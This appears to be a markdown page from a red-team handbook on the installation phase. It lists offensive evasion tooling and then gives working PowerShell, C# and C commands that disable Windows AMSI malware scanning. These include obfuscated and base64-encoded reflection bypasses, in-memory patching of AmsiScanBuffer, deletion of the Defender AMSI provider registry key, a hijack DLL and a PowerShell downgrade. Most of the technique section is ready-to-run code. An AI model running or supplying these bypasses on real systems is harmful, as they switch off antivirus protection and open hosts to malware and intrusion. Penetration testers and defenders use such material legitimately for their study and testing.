Skip to content

Latest commit

 

History

History
289 lines (220 loc) · 15.8 KB

5-Installation.md

File metadata and controls

289 lines (220 loc) · 15.8 KB
Raw

5 Installation

Table of Contents

Tooling

Name Description URL
AMSI Bypass Powershell This repo contains some Antimalware Scan Interface (AMSI) bypass / avoidance methods i found on different Blog Posts. https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell
AMSI.fail AMSI.fail generates obfuscated PowerShell snippets that break or disable AMSI for the current process. http://amsi.fail
AmsiHook AmsiHook is a project I created to figure out a bypass to AMSI via function hooking. https://github.com/tomcarver16/AmsiHook
AmsiScanBufferBypass Bypass AMSI by patching AmsiScanBuffer https://github.com/rasta-mouse/AmsiScanBufferBypass
AMSITrigger v3 The Hunt for Malicious Strings https://github.com/RythmStick/AMSITrigger
DefenderCheck Identifies the bytes that Microsoft Defender flags on. https://github.com/matterpreter/DefenderCheck
Donut Generates x86, x64, or AMD64+x86 position-independent shellcode that loads .NET Assemblies, PE files, and other Windows payloads from memory and runs them with parameters. https://github.com/TheWover/donut
EXE_to_DLL Converts a EXE into DLL https://github.com/hasherezade/exe_to_dll
Freeze Freeze is a payload toolkit for bypassing EDRs using suspended processes, direct syscalls, and alternative execution methods https://github.com/optiv/Freeze
hoaxshell An unconventional Windows reverse shell, currently undetected by Microsoft Defender and various other AV solutions, solely based on http(s) traffic. https://github.com/t3l3machus/hoaxshell
Invoke-Obfuscation PowerShell Obfuscator https://github.com/danielbohannon/Invoke-Obfuscation
mimikatz Obfuscator This script downloads and slightly "obfuscates" the mimikatz project. https://gist.github.com/imaibou/92feba3455bf173f123fbe50bbe80781
Nimcrypt2 .NET, PE, & Raw Shellcode Packer/Loader Written in Nim https://github.com/icyguider/Nimcrypt2
NimHollow Nim implementation of Process Hollowing using syscalls (PoC) https://github.com/snovvcrash/NimHollow
NimlineWhisperer2 A tool for converting SysWhispers2 syscalls for use with Nim projects https://github.com/ajpc500/NimlineWhispers2
ntlm_theft A tool for generating multiple types of NTLMv2 hash theft files. https://github.com/Greenwolf/ntlm_theft
Offensive-C-Sharp I wrote these while learning AD Pentesting and windows hacking https://github.com/winsecurity/Offensive-C-Sharp
OffensiveNim Experiments in weaponizing Nim for implant development and general offensive operations. https://github.com/0xsyr0/OffensiveNim
OffensivePipeline OffensivePipeline allows to download, compile (without Visual Studio) and obfuscate C# tools for Red Team exercises. https://github.com/Aetsu/OffensivePipeline
OffensiveRust Rust Weaponization for Red Team Engagements. https://github.com/trickster0/OffensiveRust
PSByPassCLM Bypass for PowerShell Constrained Language Mode https://github.com/padovah4ck/PSByPassCLM
ScareCrow Payload creation framework designed around EDR bypass. https://github.com/optiv/ScareCrow
Simple Injector A simple injector that uses LoadLibraryA https://github.com/tomcarver16/SimpleInjector
SysWhispers SysWhispers helps with evasion by generating header/ASM files implants can use to make direct system calls. https://github.com/m57/SysWhispers
Veil Veil is a tool designed to generate metasploit payloads that bypass common anti-virus solutions. https://github.com/Veil-Framework/Veil

AMSI Bypass

Test String

PS C:\> $str = 'amsiinitfailed'

Simple Bypass

PS C:\> $str = 'ams' + 'ii' + 'nitf' + 'ailed'

Obfuscated Bypass Techniques

PS C:\> [Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)
PS C:\> S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )

Bypass on Windows 11

https://github.com/senzee1984/Amsi_Bypass_In_2023

PS C:\> $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Failed") {$f=$e}};$f.SetValue($null,$true)
PS C:\>  $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);$ptr = [System.IntPtr]::Add([System.IntPtr]$g, 0x8);$buf = New-Object byte[](8);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 8)

PowerShell Downgrade

PS C:\> powershell -version 2

Fabian Mosch / Matt Graeber Bypass

PS C:\> [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

Base64 Encoded

PS C:\> [Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)

Hooking

https://github.com/tomcarver16/SimpleInjector

https://github.com/tomcarver16/AmsiHook

PS C:\> .\SimpleInjector.exe powershell.exe .\AMSIHook.dll

Memory Patching

https://github.com/rasta-mouse/AmsiScanBufferBypass

The patch return always AMSI_RESULT_CLEAN and shows the following line.

static byte[] x64 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };

Load and Execute the DLL

[System.Reflection.Assembly]::LoadFile("C:\Users\pentestlab\ASBBypass.dll")
[Amsi]::Bypass()

The tool AMSITrigger v3 can be used to discover the strings which are making calls to the AmsiScanBuffer.

https://github.com/RythmStick/AMSITrigger

PS C:\> .\AmsiTrigger_x64.exe -i .\ASBBypass.ps1

Obfuscating the contained code within the script will evade AMSI.

${_/==\_/\__/===\_/} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('dQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwANAAoAcAB1AGIAbABpAGMAIABjAGwAYQBzAHMAIABXAGkAbgAzADIAIAB7AA0ACgAgACAAIAAgAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAIAAgACAAIABwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEcAZQB0AFAAcgBvAGMAQQBkAGQAcgBlAHMAcwAoAEkAbgB0AFAAdAByACAAaABNAG8AZAB1AGwAZQAsACAAcwB0AHIAaQBuAGcAIABwAHIAbwBjAE4AYQBtAGUAKQA7AA0ACgAgACAAIAAgAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAIAAgACAAIABwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEwAbwBhAGQATABpAGIAcgBhAHIAeQAoAHMAdAByAGkAbgBnACAAbgBhAG0AZQApADsADQAKACAAIAAgACAAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyACIAKQBdAA0ACgAgACAAIAAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABWAGkAcgB0AHUAYQBsAFAAcgBvAHQAZQBjAHQAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIABVAEkAbgB0AFAAdAByACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwATgBlAHcAUAByAG8AdABlAGMAdAAsACAAbwB1AHQAIAB1AGkAbgB0ACAAbABwAGYAbABPAGwAZABQAHIAbwB0AGUAYwB0ACkAOwANAAoAfQA=')))
Add-Type ${_/==\_/\__/===\_/}
${__/=\/==\/\_/=\_/} = [Win32]::LoadLibrary("am" + $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cwBpAC4AZABsAGwA'))))
${___/====\__/=====} = [Win32]::GetProcAddress(${__/=\/==\/\_/=\_/}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQA='))) + $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBjAGEAbgA='))) + $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QgB1AGYAZgBlAHIA'))))
${/==\_/=\/\__/\/\/} = 0
[Win32]::VirtualProtect(${___/====\__/=====}, [uint32]5, 0x40, [ref]${/==\_/=\/\__/\/\/})
${_/\__/=\/\___/==\} = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
[System.Runtime.InteropServices.Marshal]::Copy(${_/\__/=\/\___/==\}, 0, ${___/====\__/=====}, 6)

Forcing an Error

Forcing AMSI to fail (amsiInitFailed) will result that no scan will be initiated for the current process.

PS C:\> [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

Avoiding the use of strings with the usage of variables can also evade AMSI.

$w = 'System.Management.Automation.A';$c = 'si';$m = 'Utils'
$assembly = [Ref].Assembly.GetType(('{0}m{1}{2}' -f $w,$c,$m))
$field = $assembly.GetField(('am{0}InitFailed' -f $c),'NonPublic,Static')
$field.SetValue($null,$true)

Forcing an error in order to send the flag in a legitimate way is another option. This bypass allocates a memory region for the amsiContext and since the amsiSession is set to null it will result an error.

$mem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(9076)
[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiContext","NonPublic,Static").SetValue($null, [IntPtr]$mem)
[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiSession","NonPublic,Static").SetValue($null, $null);

An obfuscated version of this bypass can be found on AMSI.fail.

$fwi=[System.Runtime.InteropServices.Marshal]::AllocHGlobal((9076+8092-8092));[Ref].Assembly.GetType("System.Management.Automation.$([cHAr](65)+[cHaR]([byTe]0x6d)+[ChaR]([ByTe]0x73)+[CHaR]([BYte]0x69)+[CHaR](85*31/31)+[cHAR]([byte]0x74)+[cHAR](105)+[cHar](108)+[Char](115+39-39))").GetField("$('àmsìSessîõn'.NoRMALiZe([char](70+54-54)+[cHaR](111)+[cHar](114+24-24)+[chaR](106+3)+[chAR](68+26-26)) -replace [CHAR](24+68)+[chaR]([BytE]0x70)+[CHar]([bYtE]0x7b)+[cHAr](77+45-45)+[chaR](62+48)+[CHAR](125*118/118))", "NonPublic,Static").SetValue($null, $null);[Ref].Assembly.GetType("System.Management.Automation.$([cHAr](65)+[cHaR]([byTe]0x6d)+[ChaR]([ByTe]0x73)+[CHaR]([BYte]0x69)+[CHaR](85*31/31)+[cHAR]([byte]0x74)+[cHAR](105)+[cHar](108)+[Char](115+39-39))").GetField("$([char]([bYtE]0x61)+[ChaR]([BYte]0x6d)+[Char](55+60)+[chAr](105+97-97)+[CHAr]([byTe]0x43)+[ChaR](111+67-67)+[char]([BytE]0x6e)+[cHaR]([bYtE]0x74)+[cHAr](101)+[CHar](120)+[cHAR](116))", "NonPublic,Static").SetValue($null, [IntPtr]$fwi);

Registry Key Modification

GUID for Windows Defender.

KLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}

The key can be removed to stop the AMSI provider to perform AMSI inspection and evade the control. Notice that this requires elevated rights.

Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse

DLL Hijacking

Requirement is to create a non-legitimate amsi.dll and place it in the same folder as the 64 Bit version of PowerShell. The PowerShell executable also can be copied into a writeable directory.

#include "pch.h"
#include "iostream"

BOOL APIENTRY DllMain(HMODULE hModule,
    DWORD  ul_reason_for_call,
    LPVOID lpReserved
)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
    {
        LPCWSTR appName = NULL;
        typedef struct HAMSICONTEXT {
            DWORD       Signature;            // "AMSI" or 0x49534D41
            PWCHAR      AppName;           // set by AmsiInitialize
            DWORD       Antimalware;       // set by AmsiInitialize
            DWORD       SessionCount;      // increased by AmsiOpenSession
        } HAMSICONTEXT;
        typedef enum AMSI_RESULT {
            AMSI_RESULT_CLEAN,
            AMSI_RESULT_NOT_DETECTED,
            AMSI_RESULT_BLOCKED_BY_ADMIN_START,
            AMSI_RESULT_BLOCKED_BY_ADMIN_END,
            AMSI_RESULT_DETECTED
        } AMSI_RESULT;

        typedef struct HAMSISESSION {
            DWORD test;
        } HAMSISESSION;

        typedef struct r {
            DWORD r;
        };

        void AmsiInitialize(LPCWSTR appName, HAMSICONTEXT * amsiContext);
        void AmsiOpenSession(HAMSICONTEXT amsiContext, HAMSISESSION * amsiSession);
        void AmsiCloseSession(HAMSICONTEXT amsiContext, HAMSISESSION amsiSession);
        void AmsiResultIsMalware(r);
        void AmsiScanBuffer(HAMSICONTEXT amsiContext, PVOID buffer, ULONG length, LPCWSTR contentName, HAMSISESSION amsiSession, AMSI_RESULT * result);
        void AmsiScanString(HAMSICONTEXT amsiContext, LPCWSTR string, LPCWSTR contentName, HAMSISESSION amsiSession, AMSI_RESULT * result);
        void AmsiUninitialize(HAMSICONTEXT amsiContext);
    }
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Source: https://pentestlaboratories.com/tag/obfuscation/

Windows Defender

Windows Defender seems like to have issues with the following function in Visual Basic Scripts.

Private Declare PtrSafe Function VirtualProtectEx Lib "kernel32" ( _
    ByVal hProcess As LongPtr, _
    ByVal lpAddress As LongPtr, _
    ByVal dwSize As Long, _
    ByVal flNewProtect As Long, _
    ByRef lpflOldProtect As LongPtr _
) As Long

Also with:

  • CreateProcess
  • VirtualAllocEx
  • GetProcAddress
  • LoadLibrary

Previous

Next